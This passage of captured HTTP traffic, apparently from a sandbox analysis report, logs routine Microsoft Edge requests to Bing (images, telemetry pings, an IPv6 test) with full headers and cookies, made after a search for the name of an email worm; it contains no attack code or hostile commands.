content-md5: Z+C+izL4Lrqm8Hojg8JfEw==
x-ms-request-id: 145aa21a-b01e-0003-638e-4fe997000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
timing-allow-origin: *
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfa31
GET

https://www.bing.com/rp/1bS66LcKydbjw6xnNUaVfMtxlhg.png

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/1bS66LcKydbjw6xnNUaVfMtxlhg.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

expires: Tue, 04 Feb 2025 06:21:33 GMT
last-modified: Tue, 24 Sep 2024 06:22:37 GMT
etag: 0x8DCDC61494121A3
cache-control: max-age=557158
akamai-grn: 0.8b777b5c.1738089983.14db6b7a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2974
content-type: image/png
content-md5: IahO/qaNOE6EY5qyB+q4UQ==
x-ms-request-id: 63cf0a66-b01e-002a-6090-219fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfa30
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22hb_feedback%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22hb_feedback%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfa37
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SRTH%22,%22FID%22:%22CI%22,%22Name%22:%22SRTHVS%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SRTH%22,%22FID%22:%22CI%22,%22Name%22:%22SRTHVS%22,%22Text%22:%221%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfa36
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 17789
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfd5f
GET

https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 54612
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfdb1
GET

https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=BingPages
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1741747023&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCfI3oNhq3R-M_Adq3ibpKMTqAipbsqrFuDOskoN1OX-zRv9o2wNWUZtAZt_SM9dx4IKLh7VhBdHXyScnVD2ILO2111NoxVqX3s9NHHKLjoTizAU-SX1WpFxOPFXQEyNulS7gxYjjJ9qCffZ8mRL_2qh&WTS=63877343822
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|&BLOCK=TS=250312023704
cookie: SRCHS=PC=U531

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 41572
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747025.32dfdb0
GET

https://www.bing.com/ipv6test/test?FORM=MONITR

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /ipv6test/test?FORM=MONITR HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
